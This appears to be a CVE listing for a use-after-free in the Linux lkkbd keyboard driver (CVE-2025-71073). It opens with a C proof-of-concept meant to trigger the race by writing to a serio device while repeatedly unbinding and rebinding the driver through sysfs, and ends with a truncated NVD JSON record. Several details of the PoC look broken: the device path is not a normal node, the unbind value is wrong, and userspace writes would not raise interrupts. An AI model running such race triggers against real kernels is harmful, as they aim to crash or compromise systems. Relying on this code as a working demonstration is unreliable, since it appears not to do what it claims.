CVE-2025-71073

// CVE-2025-71073 PoC - Race condition trigger // Compile: gcc -o poc poc.c // Run with root privileges #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <sys/ioctl.h> #include <pthread.h> #define LKKBD_DEVICE "/dev/serio/serio0" // Adjust based on system volatile int trigger_race = 1; void* interrupt_trigger(void* arg) { // Simulate rapid interrupt triggering int fd = open(LKKBD_DEVICE, O_RDWR); if (fd < 0) { perror("Failed to open device"); return NULL; } while (trigger_race) { // Trigger keyboard interrupt data unsigned char data = 0x01; write(fd, &data, 1); usleep(100); // Small delay to schedule work } close(fd); return NULL; } void* connect_disconnect_race(void* arg) { // Rapidly connect/disconnect to trigger race condition while (trigger_race) { // This would normally be done via hotplug // Simulating the disconnect path that frees the structure system("echo -n disconnect > /sys/bus/serio/devices/serio0/driver/unbind 2>/dev/null"); usleep(500); system("echo -n serio0 > /sys/bus/serio/drivers/serio/bind 2>/dev/null"); usleep(500); } return NULL; } int main() { pthread_t t1, t2; printf("[*] CVE-2025-71073 PoC - lkkbd use-after-free\n"); printf("[*] This demonstrates the race condition\n"); // Create threads to trigger race pthread_create(&t1, NULL, interrupt_trigger, NULL); pthread_create(&t2, NULL, connect_disconnect_race, NULL); // Let it run for a while sleep(10); trigger_race = 0; pthread_join(t1, NULL); pthread_join(t2, NULL); printf("[*] Test completed - check dmesg for use-after-free warnings\n"); return 0; }

{"cve": {"id": "CVE-2025-71073", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-13T16:16:06.743", "lastModified": "2026-03-25T19:10:52.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: lkkbd - disable pending work before freeing device\n\nlkkbd_interrupt() schedules lk->tq via schedule_work(), and the work\nhandler lkkbd_reinit() dereferences the lkkbd structure and its\nserio/input_dev fields.\n\nlkkbd_disconnect() and error paths in lkkbd_connect() free the lkkbd\nstructure without preventing the reinit work from being queued again\nuntil serio_close() returns. This can allow the work handler to run\nafter the structure has been freed, leading to a potential use-after-free.\n\nUse disable_work_sync() instead of cancel_work_sync() to ensure the\nreinit work cannot be re-queued, and call it both in lkkbd_disconnect()\nand in lkkbd_connect() error paths after serio_open()."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nInput: lkkbd - deshabilitar el trabajo pendiente antes de liberar el dispositivo\n\nlkkbd_interrupt() programa lk-&gt;tq a través de schedule_work(), y el manejador de trabajo lkkbd_reinit() desreferencia la estructura lkkbd y sus campos serio/input_dev.\n\nlkkbd_disconnect() y las rutas de error en lkkbd_connect() liberan la estructura lkkbd sin evitar que el trabajo de reinicio sea encolado de nuevo hasta que serio_close() retorne. Esto puede permitir que el manejador de trabajo se ejecute después de que la estructura haya sido liberada, lo que lleva a un potencial uso después de liberación.\n\nUsar disable_work_sync() en lugar de cancel_work_sync() para asegurar que el trabajo de reinicio no pueda ser reencolado, y llamarlo tanto en lkkbd_disconnect() como en las rutas de error de lkkbd_connect() después de serio_open()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.12.1", "versionEndExcluding": "6.12.64", "matchCriteriaId": "34C17A5E-8110-44F4-8B61-A38020E57DEA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.3", "matchCriteriaId": "2DC484D8-FB4F-4112-900F-AE333B6FE7A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:-:*:*:*:*:*:*", "matchCriteriaId": "6F62EECE-8FB1-4D57-85D8-CB9E23CF313C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc2:*:*:*:*:*:*", "matchCriteriaId": "4F76C298-81DC-43E4-8FC9-DC005A2116EF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc3:*:*:*:*:*:*", "matchCriteriaId": "0AB349B2-3F78-4197-882B-90ADB3BF645A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "matchCriteriaId": "6AC88830-A9BC-4607-B572-A4B502FC9FD0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "matchCriteriaId": "476CB3A5-D022-4F13-AAEF-CB6A5785516A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": ... (truncated)